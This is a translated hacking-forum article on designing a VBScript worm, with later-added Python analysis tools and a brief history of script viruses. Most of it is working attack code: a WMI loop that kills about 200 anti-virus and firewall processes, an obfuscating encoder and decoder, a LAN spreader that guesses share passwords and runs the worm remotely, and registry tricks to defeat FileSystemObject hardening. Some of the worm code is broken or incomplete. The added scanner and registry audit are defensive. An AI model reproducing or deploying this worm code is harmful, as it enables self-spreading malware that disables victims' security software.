Research on the concept of Hyper-script virus-vulnerability

Source: Internet
Author: User
Tags: chr, rand, microsoft, outlook
The idea of a Hyper script virus
Say goodbye to the days of chasing the limelight and bragging; learning some real skills is what counts. Study hard and improve a little every day. Here, then, is the idea behind a hyper-script virus.
Script viruses are very easy to make. Someone who knows nothing about programming, but knows enough about Windows and the registry, can download a few virus sources from the network, look them over, and have a working variant in a short time. Script viruses have few distinctive features and demand little programming skill, which is why the serious virus writers did not use VBScript; but now that scripting languages and Microsoft's WSH (Windows Script Host) are everywhere, these languages can make waves on a single machine. WSH lets VBScript and JScript run in a Windows environment much like batch files, for example from the command line, and it lets a script create COM/OLE objects in Windows and use their methods, properties and events.
Because script viruses are so easy to write, they are also easy to identify and defend against, and articles on how to prevent them are a dime a dozen. People develop, and viruses evolve with them. As the saying goes: the old cat is in training, and if the mouse does not train too, it is finished.
1. Many anti-virus products can now flag unknown script viruses heuristically, so a virus that wants to survive needs better protection:
(1) The virus should make heavy use of WMI so that it can kill the processes of anti-virus software and firewalls. Here is a piece of code:
strComputer = "."
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
' Main process names of anti-virus and firewall products (as listed on the page, duplicates included)
Fv = Array( _
    "Notepad.exe", "Pccguide.exe", "Pccclient.exe", "Rfw.exe", "DAVPFW.exe", "Vpc32.exe", "Ravmon.exe", "Debu.exe", "Scan.exe", _
    "Mon.exe", "Vir.exe", "Iom.exe", "Ice.exe", "Anti.exe", "Fir.exe", "Prot.exe", "Secu.exe", "Dbg.exe", _
    "Pcc.exe", "Avk.exe", "Spy.exe", "Pcciomon.exe", "Pccmain.exe", "Pop3trap.exe", "Webtrap.exe", "Vshwin32.exe", "Vsstat.exe", _
    "Navapw32.exe", "Lucomserver.exe", "Lamapp.exe", "Atrack.exe", "Nisserv.exe", "Vavrunr.exe", "Navwnt.exe", "Pview95.exe", "Luall.exe", _
    "Avxonsol.exe", "Avsynmgr.exe", "Symproxysvc.exe", "Regedit.exe", "Smtpsvc.exe", "Moniker.exe", "Program.exe", "Explorewclass.exe", "Rn.exe", _
    "Ms.exe", "Microsoft.exe", "Office.exe", "Smtpsvc.exe", "Avconsol.exe", "Avsunmgr.exe", "Vsstat.exe", "Navapw32.exe", "Navw32.exe", _
    "Nmain.exe", "Luall.exe", "Lucomserver.exe", "Iamapp.exe", "Atrack.exe", "Nisserv.exe", "Rescur32.exe", "Nisum.exe", "navlu32.exe", _
    "Navrunr.exe", "Pview95.exe", "F-stopw.exe", "F-prot95.exe", "Pccwin98.exe", "Fp-win.exe", "Nvc95.exe", "Norton.exe", "Mcafee.exe", _
    "Antivir.exe", "Webscanx.exe", "Safeweb.exe", "Cfinet.exe", "Cfinet32.exe", "Avp.exe", "Lockdown2000.exe", "Lockdown2002.exe", "Zonealarm.exe", _
    "Wink.exe", "Sirc32.exe", "Scam32.exe", "Regedit.exe", "Tmoagent.exe", "Tmntsrv.exe", "Tmproxy.exe", "Tmupdito.exe", "Tsc.exe", _
    "Krf.exe", "Kpfw32.exe", "_avpm.exe", "Autodown.exe", "Avkser.exe", "Avpupd.exe", "Blackd.exe", "Cfind.exe", "Cleaner.exe", _
    "Ecengine.exe", "Fp-win.exe", "Iamserv.exe", "Lcloadnt.exe", "Lookout.exe", "N32acan.exe", "Navw32.exe", "Normist.exe", "Padmin.exe", _
    "Pccwin98.exe", "Rav7win.exe", "Smc.exe", "Tca.exe", "Vettray.exe", "Ackwin32.exe", "Avpnt.exe", "Avpdos32.exe", "Avsched32.exe", _
    "Blackice.exe", "Efinet32.exe", "Esafe.exe", "Ibmasn.exe", "Icmoon.exe", "Navapw32.exe", "Nupgrade.exe", "Pavcl.exe", "Pcfwallicon.exe", _
    "Scanpm.exe", "Sphinx.exe", "Sphinx.exe", "Tds2-98.exe", "Vsscan40.exe", "Webscanx.exe", "Webscan.exe", "Anti-trojan.exe", "Ave32.exe", _
    "Avp.exe", "Avpm.exe", "Cfiadmin.exe", "Dvp95.exe", "Espwatch.exe", "Ibmavsp.exe", "Icsupp95.exe", "Jed.exe", "Moolive.exe", _
    "Nisum.exe", "Nvc95.exe", "Navsched.exe", "Persfw.exe", "Safeweb.exe", "Scrscan.exe", "Sweep95.exe", "Tds2-nt.exe", "_avpcc.exe", _
    "Apvxdwin.exe", "Avwupd32.exe", "Cfiaudit.exe", "Claw95ct.exe", "Dv95_o.exe", "F-agnt94.exe", "findviru.exe", "Iamapp.exe", "Icload95.exe", _
    "Icssuppnt.exe", "Mpftray.exe", "Nmain.exe", "Rav7.exe", "Scan32.exe", "Serv95.exe", "Vshwin32.exe", "Zonealarm.exe", "Avpmon.exe", _
    "Avp32.exe", "Kavsvc.exe", "Mcagent.exe", "Nvsvc32.exe", "Mcmnhdlr.exe", "Regsvc.exe", "Mailmon.exe", "Fp-win.exe", "Mghtml.exe")
' Loop forever, terminating every listed process the moment it appears
Do
    For Each fa In Fv
        Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & fa & "'")
        For Each objProcess In colProcessList
            objProcess.Terminate()
        Next
    Next
Loop
The Array() holds the main process names of close to 200 anti-virus and firewall products. You can, of course, define the array at the start of the program and reuse it in the infection routine to delete those products' executables. Even a pig could work that out, so I need not say more (my online handle happens to be "pig"). All of this has to get in before the anti-virus software is running to achieve its goal. Note that with impersonationLevel=impersonate the Terminate call runs with the caller's rights: under a limited account the loop silently fails against anything running as SYSTEM.
(2) The virus should use polymorphism wherever possible and new encryption routines. Script "encryption" is of course very simple; the new "Happy Time" worm does this well. The encoded script is handed to Execute, with the decoder appended:
Execute DeCode("Kqe ' mv FCJJM")   ' sample literal as printed on the page
' Shift every character back by two; the four control codes stand for line
' feed, carriage return, space and tab (constants as used by the C tool below;
' the page left them blank here).
Function DeCode(coded)
    For i = 1 To Len(coded)
        curchar = Mid(coded, i, 1)
        If Asc(curchar) = 15 Then
            curchar = Chr(10)
        ElseIf Asc(curchar) = 16 Then
            curchar = Chr(13)
        ElseIf Asc(curchar) = 17 Then
            curchar = Chr(32)
        ElseIf Asc(curchar) = 18 Then
            curchar = Chr(9)
        Else
            curchar = Chr(Asc(curchar) - 2)
        End If
        DeCode = DeCode & curchar
    Next
End Function
The following is a C example that produces such a script (my skills are limited; corrections welcome at Hackercc@qq.com):
/* Obfuscate a VBScript file in place: shift every byte by +2, replace LF, CR,
 * space and tab with the control codes 15-18, then wrap the result in
 * Execute DeCode("...") and append the DeCode function that reverses it.
 * (The listing as printed applied DeCode's own direction to the input, which
 * cannot yield a runnable script; the mapping below is DeCode's inverse.)
 * Assumes an ASCII script: bytes above 253 would wrap. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const char *head = "Execute DeCode(\"";
static const char *tail = "\")\n";
static const char *func =
    "Function DeCode(coded)\n"
    "For i = 1 To Len(coded)\n"
    "curchar = Mid(coded, i, 1)\n"
    "If Asc(curchar) = 15 Then\n"
    "curchar = Chr(10)\n"
    "ElseIf Asc(curchar) = 16 Then\n"
    "curchar = Chr(13)\n"
    "ElseIf Asc(curchar) = 17 Then\n"
    "curchar = Chr(32)\n"
    "ElseIf Asc(curchar) = 18 Then\n"
    "curchar = Chr(9)\n"
    "Else\n"
    "curchar = Chr(Asc(curchar) - 2)\n"
    "End If\n"
    "DeCode = DeCode & curchar\n"
    "Next\n"
    "End Function\n";

/* Inverse of DeCode: whitespace becomes a control code, everything else +2 */
static int encode_char(int ch)
{
    switch (ch) {
    case 10: return 15;
    case 13: return 16;
    case 32: return 17;
    case 9:  return 18;
    default: return ch + 2;
    }
}

int main(void)
{
    char name[260];
    FILE *in, *out;
    long size, i;
    unsigned char *buf;

    /* File name is read from standard input */
    if (!fgets(name, sizeof name, stdin))
        return 1;
    name[strcspn(name, "\r\n")] = '\0';

    if ((in = fopen(name, "rb")) == NULL) {
        printf("Can't open the file %s\n", name);
        return 1;
    }
    fseek(in, 0L, SEEK_END);
    size = ftell(in);
    rewind(in);
    buf = malloc((size_t)size + 1);
    if (buf == NULL || fread(buf, 1, (size_t)size, in) != (size_t)size) {
        fclose(in);
        free(buf);
        return 1;
    }
    fclose(in);

    /* Overwrite the same file with the wrapped, encoded script */
    if ((out = fopen(name, "wb")) == NULL) {
        free(buf);
        return 1;
    }
    fputs(head, out);
    for (i = 0; i < size; i++)
        fputc(encode_char(buf[i]), out);
    fputs(tail, out);
    fputs(func, out);
    fclose(out);
    free(buf);
    return 0;
}
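The same shift-by-two scheme, implemented both ways so an analyst can strip the wrapper and read what `Execute DeCode("...")` would run. This is an added example, not code from the page or its author; the control-code constants 15 to 18 for LF, CR, space and tab are taken from the C listing above, the shift of 2 from the VBScript DeCode function, and the sample script is constructed.

```python
"""Encoder/decoder for the shift-by-two VBScript obfuscation described above.

Added example; constants 15-18 follow the C listing, the shift of 2 the DeCode
function. Nothing here is code from the original page."""
import re

SHIFT = 2
# Whitespace is swapped for control codes rather than shifted, so the encoded
# literal contains no line break and no double quote: the only byte that would
# shift to 34 ('"') is 32 (space), and space is remapped.
_SPECIAL = {10: 15, 13: 16, 32: 17, 9: 18}
_SPECIAL_INV = {v: k for k, v in _SPECIAL.items()}

# The routine the C tool appends after the Execute call.
DECODE_FUNCTION = """Function DeCode(coded)
For i = 1 To Len(coded)
curchar = Mid(coded, i, 1)
If Asc(curchar) = 15 Then
curchar = Chr(10)
ElseIf Asc(curchar) = 16 Then
curchar = Chr(13)
ElseIf Asc(curchar) = 17 Then
curchar = Chr(32)
ElseIf Asc(curchar) = 18 Then
curchar = Chr(9)
Else
curchar = Chr(Asc(curchar) - 2)
End If
DeCode = DeCode & curchar
Next
End Function
"""


def encode(plain: str) -> str:
    """Inverse of DeCode: the transform applied to the clear script."""
    return "".join(chr(_SPECIAL.get(ord(c), ord(c) + SHIFT)) for c in plain)


def decode(coded: str) -> str:
    """Same mapping as the VBScript DeCode function."""
    return "".join(chr(_SPECIAL_INV.get(ord(c), ord(c) - SHIFT)) for c in coded)


def wrap(plain: str) -> str:
    """Build the obfuscated script: Execute DeCode("...") plus the decoder."""
    return 'Execute DeCode("' + encode(plain) + '")\n' + DECODE_FUNCTION


# The literal never contains '"' (see above), so [^"]* stops at its end.
_CALL = re.compile(r'Execute\s+DeCode\s*\(\s*"([^"]*)"\s*\)', re.IGNORECASE)


def unwrap(script: str):
    """Analyst side: pull the literal out of an obfuscated script and decode it.
    Returns None when the script does not use this wrapper."""
    m = _CALL.search(script)
    return decode(m.group(1)) if m else None


if __name__ == "__main__":
    # Constructed, harmless sample script
    sample = 'Set fso = CreateObject("Scripting.FileSystemObject")\nMsgBox "hello"\n'
    obfuscated = wrap(sample)
    print(obfuscated.splitlines()[0].encode("ascii", "backslashreplace").decode())
    print(unwrap(obfuscated) == sample)
```

Because the clear text only ever exists as the argument to Execute, a static scanner sees just the literal; the usual shortcut when triaging such a file is to replace `Execute` with `WScript.Echo` and run it, which prints the decoded script without executing it.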

2. The virus's reach can be extended to vulnerable hosts on the network; the worm can use basic DOS commands and third-party hacking tools to exploit them.
3. The virus propagates by e-mail and across the local area network:
To attack the LAN it can use simplified networking code, run the virus body directly on the remote host (the code below uses WSH remote scripting through WSHController rather than WMI) and guess share passwords (an exhaustive search is too time-consuming and unnecessary):
Sub NetShare()
    Dim o1, o2, o3, o4, rand, dot, count, name, driveconnected, pwd, strings, k
    count = "0"
    dot = "."
    driveconnected = "0"
    ' ProgIDs are assembled from fragments so a plain string match does not see them
    Set Yu = CreateObject("Scrip" + "ting." + "FileSyst" + "emOb" + "ject")
    Set Net = CreateObject("WSc" + "ript.N" + "etwork")
    Set Qq = CreateObject("WSc" + "ript.S" + "hell")
    On Error Resume Next
    Randomize
    randaddress()
    Do
        Do While driveconnected = "0"
            checkaddress()
            sharename()
            pwd = ""
            pqd = ""
            strings = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
            ' Guess the share password one character at a time. The test below is as
            ' printed in the source; Net.Body and wrong are not defined anywhere.
            For k = 1 To Len(strings) Step 1
                Net.MapNetworkDrive "I:", "\\" & name & "\c", pwd & Mid(strings, k, 1), pqd & Mid(strings, k, 1)
                If InStr(Net.Body, wrong) <> 0 Then
                    pwd = pwd & Mid(strings, k, 1)
                End If
            Next
            enumdrives()
        Loop
        copy()
        disconnectdrive()
        Qq.Run "\\" & name & "\con\con", 0   ' the con\con device-name path (Windows 9x crash)
        Run()
    Loop
End Sub

Function Run()
    Dim Controller, remotescript
    ' WSH remote scripting: the target must have Remote=1 under its
    ' Windows Script Host\Settings key and the caller needs administrative rights there
    Set Controller = WScript.CreateObject("WSHC" + "ontroller")
    Set remotescript = Controller.CreateScript("System.vbe", name)
    WScript.ConnectObject remotescript, "Remote_"
    remotescript.Execute
    Do While remotescript.Status <> 2   ' 2 = finished
        WScript.Sleep 100
    Loop
    WScript.DisconnectObject remotescript
    Remote_Error()
End Function

Sub Remote_Error
    Dim theError
    Set theError = remotescript.Error
    WScript.Echo "Error " & theError.Number & " - line: " & theError.Line & ", char: " & theError.Character & vbCrLf & "Description: " & theError.Description
    WScript.Quit -1
End Sub

Function disconnectdrive()
    Net.RemoveNetworkDrive "I:"
    driveconnected = "0"
End Function

Function copy()
    ' Copy the worm to the other machine
    Yu.CopyFile dir2 & "\system.vbe", "I:\windows\"
    Yu.CopyFile dir2 & "\system.vbe", "I:\windows\system32\"
    Yu.CopyFile dir2 & "\system.vbe", "I:\winnt\system32\"
    Yu.CopyFile dir2 & "\system.inf", "I:\winnt\system32\"
    Yu.CopyFile dir2 & "\system.inf", "I:\windows\system32\"
End Function

Function checkaddress()
    o4 = o4 + 1
    If o4 = "255" Then randaddress()
End Function

Function sharename()
    ' Build the dotted address from the four octets
    name = o1 & dot & o2 & dot & o3 & dot & o4
End Function

Function enumdrives()
    Set You = Net.EnumNetworkDrives
    For p = 0 To You.Count - 1
        If name = You.Item(p) Then
            driveconnected = 1
        Else
            driveconnected = 0
        End If
    Next
End Function

Function Randum()
    rand = Int((254 * Rnd) + 1)
End Function

Function randaddress()
    If count < Then                ' threshold missing in the source
        o1 = Int(() * Rnd + 199)   ' range missing in the source
        count = count + 1
    Else
        Randum()
        o1 = rand
    End If
    Randum()
    o2 = rand
    Randum()
    o3 = rand
    o4 = "1"
End Function
4. Some advanced Windows users protect against script viruses by deleting the FileSystemObject entry from the registry. The new worm therefore checks at startup whether the FileSystemObject entry exists and writes it back if it does not; it can also register the object under a different name, which anti-virus software does not necessarily recognise. Deleting the ProgID alone does not remove the COM server: scrrun.dll stays registered under its CLSID, so anything that knows the CLSID, or registers a new ProgID for it as below, still gets the object. Disabling WSH itself (Enabled = 0 under Software\Microsoft\Windows Script Host\Settings) or unregistering scrrun.dll is the more robust defence.
On Error Resume Next
Set wa = CreateObject("WSc" + "ript.S" + "hell")
' Re-enable the registry tools if a policy has disabled them
tt = wa.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools")
If tt = 1 Then
    wa.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
End If
' Put the FileSystemObject class key back if it has been removed
uu = wa.RegRead("HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\")
If uu = "" Then
    wa.RegWrite "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\", "FileSystemObject", "REG_SZ"
End If

Or, alternatively, register the same CLSID under a new ProgID:

wa.RegDelete "HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\"
wa.RegDelete "HKEY_CLASSES_ROOT\Scripting.FileSystemObject\"
wa.RegWrite "HKEY_CLASSES_ROOT\Wangzhitong\", "FileSystem Object", "REG_SZ"
wa.RegWrite "HKEY_CLASSES_ROOT\Wangzhitong\CLSID\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ"
Set Yu = CreateObject("Wangzhitong")
From then on the system's FileSystemObject is reached through the ProgID Wangzhitong instead of Scripting.FileSystemObject.
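The techniques in sections 1, 3 and 4 leave recognisable traces in the script text, provided the scanner first undoes the fragment trick (`"WSc" + "ript.S" + "hell"`) that every listing above relies on. The following static indicator scan is an added example, not code from the page or its author; the rule set and weights are the editor's own, derived from the listings above, and both sample scripts are constructed.

```python
"""Static indicator scan for the VBScript worm techniques on this page.

Added example, not code from the original page. Rules and weights are the
editor's own: WMI process killing (section 1), the Execute-based decoder
(section 1), the WSHController spreader (section 3), the FileSystemObject
re-registration (section 4) and ProgIDs split into string fragments."""
import re

# Fold "WSc" + "ript.S" + "hell" (or the & form) into "WScript.Shell" so the
# rules below can match plain ProgIDs. Repeats until nothing changes.
_CONCAT = re.compile(r'"([^"\n]*)"\s*[+&]\s*"([^"\n]*)"')


def fold_strings(src: str) -> str:
    while True:
        folded = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if folded == src:
            return folded
        src = folded


# A handful of names from the kill list above (lower case); five or more
# distinct ones in a single script is a strong tell.
AV_NAMES = ("avp.exe", "zonealarm.exe", "navapw32.exe", "pccguide.exe", "ravmon.exe",
            "kavsvc.exe", "blackice.exe", "f-prot95.exe", "vshwin32.exe", "persfw.exe")

# (indicator, weight, pattern); patterns run on the folded, lower-cased source.
RULES = [
    ("wmi_process_kill", 4, re.compile(r"winmgmts:.*win32_process.*\.terminate", re.S)),
    ("wsh_remote_exec", 4, re.compile(r"wshcontroller.*\.createscript", re.S)),
    ("share_mapping_loop", 2, re.compile(r"\b(for|do)\b.*mapnetworkdrive", re.S)),
    ("fso_reregister", 4, re.compile(
        r"reg(write|delete)[^\n]*(scripting\.filesystemobject|0d43fe01-f093-11cf-8940-00a0c9054228)")),
    ("regtools_policy", 2, re.compile(r"disableregistrytools")),
    ("execute_decoder", 3, re.compile(r"\bexecute\s+\w+\s*\(")),
]
# Checked on the raw source, before folding: CreateObject("WSc" + "ript...
_FRAGMENTED = re.compile(r'createobject\s*\(\s*"[^"\n]*"\s*[+&]\s*"')


def scan(src: str) -> dict:
    """Return the matched indicators, a score and a coarse verdict."""
    hits = {}
    if _FRAGMENTED.search(src.lower()):
        hits["fragmented_progid"] = 3
    folded = fold_strings(src).lower()
    for name, weight, pattern in RULES:
        if pattern.search(folded):
            hits[name] = weight
    if sum(1 for n in AV_NAMES if n in folded) >= 5:
        hits["av_kill_list"] = 4
    score = sum(hits.values())
    verdict = "likely-malicious" if score >= 8 else "review" if score >= 4 else "clean"
    return {"hits": sorted(hits), "score": score, "verdict": verdict}


# Constructed samples: inert fragments in the style of the listings above,
# and an ordinary administrative script that also touches WMI.
WORM_SAMPLE = r'''
Set Qq = CreateObject("WSc" + "ript.S" + "hell")
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Fv = Array("Avp.exe", "Zonealarm.exe", "Navapw32.exe", "Pccguide.exe", "Ravmon.exe", "Kavsvc.exe")
For Each fa In Fv
    Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & fa & "'")
    For Each objProcess In colProcessList
        objProcess.Terminate()
    Next
Next
Qq.RegWrite "HKEY_CLASSES_ROOT\Wangzhitong\CLSID\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ"
Set Controller = WScript.CreateObject("WSHC" + "ontroller")
Set remotescript = Controller.CreateScript("System.vbe", name)
Execute DeCode("...")
'''

BENIGN_SAMPLE = r'''
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set procs = objWMIService.ExecQuery("Select Name, ProcessId from Win32_Process")
For Each p In procs
    WScript.Echo p.Name & vbTab & p.ProcessId
Next
'''

if __name__ == "__main__":
    for label, text in (("worm", WORM_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan(text))
```

The folding step is the part worth keeping: without it the ProgID rules never fire on the fragmented forms, while an inventory script that merely enumerates Win32_Process stays clean because the kill rule requires the `.Terminate` call as well.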
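The registry side of the same trick can be hunted offline: any ProgID other than Scripting.FileSystemObject whose CLSID subkey resolves to {0D43FE01-F093-11CF-8940-00A0C9054228} is an alias nobody installs by accident. This check is an added example, not code from the page or its author; it parses the text of a `reg export` file, and the export below is constructed to mirror the Wangzhitong alias described in this section.

```python
"""Audit a registry export for ProgID aliases of the FileSystemObject CLSID.

Added example, not code from the original page. Parses the text of a .reg
file (as written by `reg export`) and reports every ProgID whose CLSID subkey
points at the FileSystemObject class. The sample export is constructed."""
import re

FSO_CLSID = "{0D43FE01-F093-11CF-8940-00A0C9054228}"
FSO_PROGID = "Scripting.FileSystemObject"

# ProgIDs can live under any of these roots. HKCR is the merged view of the
# other two, and HKCU\Software\Classes is writable without admin rights.
_PROGID_CLSID_KEY = re.compile(
    r"^(?:HKEY_CLASSES_ROOT|HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes|"
    r"HKEY_CURRENT_USER\\Software\\Classes)\\([^\\]+)\\CLSID$", re.IGNORECASE)


def parse_reg(text: str) -> dict:
    """Minimal .reg parser: {key path: {value name: data}}, '@' = default value.
    Only string data matters here; other types are kept verbatim."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "@" if name == "@" else name.strip('"')
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        keys[current][name] = data
    return keys


def progids_for_clsid(reg: dict, clsid: str) -> list:
    """Every ProgID whose CLSID subkey's default value is clsid."""
    found = set()
    for key, values in reg.items():
        m = _PROGID_CLSID_KEY.match(key)
        if m and values.get("@", "").upper() == clsid.upper():
            found.add(m.group(1))
    return sorted(found, key=str.lower)


def audit_fso(reg: dict) -> dict:
    """Is the canonical ProgID present, and which other ProgIDs point at FSO?"""
    progids = progids_for_clsid(reg, FSO_CLSID)
    aliases = [p for p in progids if p.lower() != FSO_PROGID.lower()]
    return {
        "canonical_present": any(p.lower() == FSO_PROGID.lower() for p in progids),
        "aliases": aliases,
        "suspicious": bool(aliases),  # a second ProgID for this CLSID is never stock
    }


# Constructed export: an unrelated key, the stock entry, and the worm's alias.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.vbs]
@="VBSFile"

[HKEY_CLASSES_ROOT\Scripting.FileSystemObject]
@="FileSystem  Object"

[HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID]
@="{0D43FE01-F093-11CF-8940-00A0C9054228}"

[HKEY_CLASSES_ROOT\Wangzhitong]
@="FileSystem Object"

[HKEY_CLASSES_ROOT\Wangzhitong\CLSID]
@="{0D43FE01-F093-11CF-8940-00A0C9054228}"
"""

if __name__ == "__main__":
    print(audit_fso(parse_reg(SAMPLE_REG)))
```

On a live system, `reg export HKCR hkcr.reg` writes UTF-16 text, so read it with `open(path, encoding="utf-16")` before passing it to `parse_reg`. A missing canonical ProgID with no alias is consistent with the hardening described above; an alias is the worm's signature, and because HKCU\Software\Classes is user-writable the alias variant needs no elevation.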
6. How can a worm refuse to share a system with other worms? It can remove the other virus programs, but you have to analyse them first; then simply clean them out.
--------------------------------------------------------------------------------------------

The following notes on computer-virus history were copied from elsewhere for reference.
1999/3: A computer virus called "Melissa" swept across Europe and the United States. It used mail systems to replicate and spread, causing network congestion and even paralysis, and it could also leak documents as it travelled.
2000/5: The "Love Worm" (LoveLetter) virus appeared. It is a script virus that spreads through Microsoft's e-mail system. The message, titled "I Love You", carries an attachment "LOVE-LETTER-FOR-YOU.TXT.vbs"; once it is opened in Microsoft's mail client, the system automatically copies the virus and sends it to every address in the user's address book. It spread several times faster than Melissa.
2001/1/21: A variant of Melissa attacks Macintosh computers. It infects Mac files; the large volume of e-mail it generates can clog servers, and it modifies the settings of Microsoft Word and infects documents and templates. The attachment carrying this Melissa variant is named "anniv.doc". This was the first time a virus of this type targeted the Macintosh.
2001/2/15: On the 13th, Dutch police arrested a 20-year-old man who claimed to have written the "Kournikova" computer virus; he faces up to four years in prison. The Kournikova virus, spread by e-mail, hit Europe, America and Asia on the 12th, leaving mail systems with a large backlog of junk messages; systems slowed markedly and some companies simply shut their e-mail systems down. The Dutchman claimed to be a fan of the 19-year-old Russian tennis player Anna Kournikova. He said he was no programming expert: he downloaded a program from the internet and used it to produce the virus.
2001/5/6: A new malicious computer virus, "Happy Time" (VBS.HappyTime.A worm), began to spread in China. It is probably home-grown and resembles the "Love Worm". When a user receives a message carrying the virus through Microsoft Outlook, the virus is activated as soon as the mouse pointer rests on the infected message, whether or not the message is opened, and it immediately infects files on the hard disk. On an infected computer, when the month and day of the system clock add up to 13, the virus gradually deletes EXE and DLL files from the hard disk until the system is paralysed.
2001/5/11: A new virus, "Homepage", is spreading worldwide; it is considered a "distant relative" of Kournikova. The e-mail carrying it is titled "Homepage" and the body reads: "Hey, you should look at this page, it's really cool." The message carries an attachment named "homepage.HTML.vbs". When the user opens the attachment, the virus first replicates itself and sends an infected message to every address in the Microsoft Outlook address book, then searches the Outlook inbox and deletes every message titled "Homepage", and opens several pornographic web pages. Fortunately the damage was limited: fewer than 10,000 computers were affected. Thanks to the time difference, U.S. anti-virus companies were able to stop its further spread after receiving news from the eastern hemisphere. (Source: Years Federation; Author: Guinea pig)
